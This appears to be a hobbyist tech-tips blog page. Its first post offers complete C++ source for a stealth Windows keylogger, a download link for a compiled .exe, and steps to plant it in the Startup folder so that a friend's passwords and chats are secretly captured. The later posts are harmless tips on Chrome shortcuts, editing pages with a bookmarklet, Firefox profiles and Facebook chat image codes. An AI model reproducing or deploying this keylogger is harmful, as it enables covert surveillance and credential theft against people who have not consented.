Steel passwords of any one ,who logged in to your system


The Following Code Captures All The Key Strokes Of  your keyBoard

NOTE: I am not responsible for any misuse of code
So when Your Friend  Logged  In Your System,His password or chating list will be captured...

1.  Code:
   If u Dont know c or c++.. You can simply download .exe file from here http://www.mediafire.com/?wyi9r6kh3k9hktx
 and Move to Step 2

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
int I;
while (1)
{
 for (I = 8; I<= 190; I++)
 {
  if (GetAsyncKeyState(I) == -32767)
  Save (I,"log.txt");
 }
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

2.After getting key logger.exe file 
  save it in your secret folder(say folder name as Keylog)
3.create a shortcut to .exe file and save it in the following path(for windows 7)
   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
4.Run the file by just clicking on it
5.Now all your keystrokes will be stored in  log.txt(see in secret folder where your key logger.exe file is stored)
6.Thats it....Now all the Keystrokes will be captured and search for passwords in log.txt


How To Stop Keylogger(capturing)
1.If u Want to Permanently stop capturing ...just delete short cut in startup folder as specified above
2.if you want to stop for current session(untill you logoff or shutdown)
    got to task manager(ctrl+alt+del) ,click on processes tab and end  key logger.exe process 




If you Have Any Quires Regarding Post,just comment Here.. 
    

newer post

Google Chrome Shorcut keys

GOOGLE CHROME SHORTCUT KEY'S

CTRL + SHIFT + N : automatically opens up a Chrome ‘incognito’ window which allows you to surf on a PC without leaving behind any digital footprints.

SHIFT + Escape: allows for fast access to Chrome’s task Manager utility that allows you to nix browser processes that have gone awry.

CTRL + SHIFT + T: will open recently closed browser tabs.

Ctrl+N – Open a new window

Ctrl+Shift+N – Open a new window in incognito mode

Press Ctrl,and click a link – Open link in a new tab

Press Shift, and click a link – Open link in a new window

Alt+F4 - Close current window

Ctrl+T - Open a new tab

Ctrl+Shift+T – Reopen the last tab you’ve closed. Google Chrome remembers the last 10 tabs you’ve closed.

Drag link to tab – Open link in specified tab

Drag link to space between tabs – Open link in a new tab in the specified position on the tab strip

Ctrl+1 through Ctrl+8 – Switch to the tab at the specified position number. The number you press represents a position on the tab strip.

Ctrl+9 – Switch to the last tab

Ctrl+Tab or Ctrl+PgDown – Switch to the next tab
Ctrl+Shift+Tab or Ctrl+PgUp – Switch to the previous tab
Ctrl+W or Ctrl+F4 – Close current tab or pop-up
Alt+Home – Open your homepage
Ctrl+O, then select file – Open a file from your computer in Google Chrome
Ctrl+P – Print your current page
F5 – Reload current page
Esc – Stop page loading
Ctrl+F5 or Shift+F5 – Reload current page, ignoring cached content
Press Alt, and click a link – Download link
Ctrl+F – Open find-in-page box
Ctrl+G or F3 – Find next match for your input in the find-in-page box
Ctrl+Shift+G or Shift+F3 – Find previous match for your input in the find-in-page box
Ctrl+U – View source
Drag link to bookmarks bar – Bookmark the link
Ctrl+D – Bookmark your current webpage
Ctrl++ – Make text larger
Ctrl+- – Make text smaller
Ctrl+0 – Return to normal text size
Ctrl+B – Toggle bookmarks bar on and off
Ctrl+H – View the History page
Ctrl+J – View the Downloads page
newer post

Code to Edit any Web page in Browser

     
        Edit any webpage with just this javascript code 









1.Go To the page,which you want to edit

2.Enter " javascript:" in address bar ( without quotes ,Enter Manually dont try to copy and paste)

3.Append the code (u can copy this) 

document.body.contentEditable='true'; document.designMode='on'; void 0


4.Hit Enter

Thats it You can edit the webpage (Some texts are image files,you cant edit images)


If u take snapshot of it by using either "snipping tool" or by print screen key

If You are facing any problem just comment here.......
newer post

Open multiple facebook accounts in a Browser

How to open multiple accounts in a browser

1.Google chrome ctrl+shift+N
2.Firefox 

In FireFox,it is some what difficult ,But This is for Firefox Fans (I prefer 
Google chrome )

a) open Run and type 
firefox -no-remote -P
b) Create an extra profile by using the Create Profile wizard, and make sure that each profile has a distinct name. You’ll also want to leave the “Don’t ask at startup” box checked.

c)select created profile

If you want to login to another ( 3 rd account ) then follow from
step a

I suggest you to use Google chrome for multiple logins

If you Have any problem regarding this, just comment here.....
How to open multiple accounts in a browser

1.  In  Google chrome           press     ctrl+shift+N   (opens a new incognito window )



2.In  Firefox 


In FireFox,it is some what difficult ,But This is for Firefox Fans (I prefer 
Google chrome )

a) open Run and type 
firefox -no-remote -P
b) Create an extra profile by using the Create Profile wizard, and make sure that each profile has a distinct name. You’ll also want to leave the “Don’t ask at startup” box checked.

c)select created profile

If you want to login to another ( 3 rd account ) then follow from
step a

I suggest you to use Google chrome for multiple logins

If you Have any problem regarding this, just comment here.....
newer post

Create your own code for images in facebook chat

STEPS:

☻  Go to this link - http://smileyti.me/ 

☻ Upload your pic 

☻ Fill the captcha and then click on upload pic,

NOW YOUR PICTURE CODE WILL BE GENERATED,,

SIMPLY COPY AND PASTE IT IN CHATBOX........HAVE FUN...
newer post

Big size Images In FACEBOOK chat box

Many Guys want to know How can i Post Picture In Chat box?
 Facebook chat now supports Picture As Lyk we use EMOTION! 

Copy and Paste  the code in chat box
1. MR.BEAN ->

[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]

2. JAKE Sparrow ->

[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

3. SUPERMAN ->

[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

4. LOL FACE->

[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]


newer post
newer post older post Home